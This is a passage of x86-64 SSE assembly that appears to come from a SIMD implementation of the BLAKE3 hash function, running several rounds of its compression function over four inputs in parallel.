punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
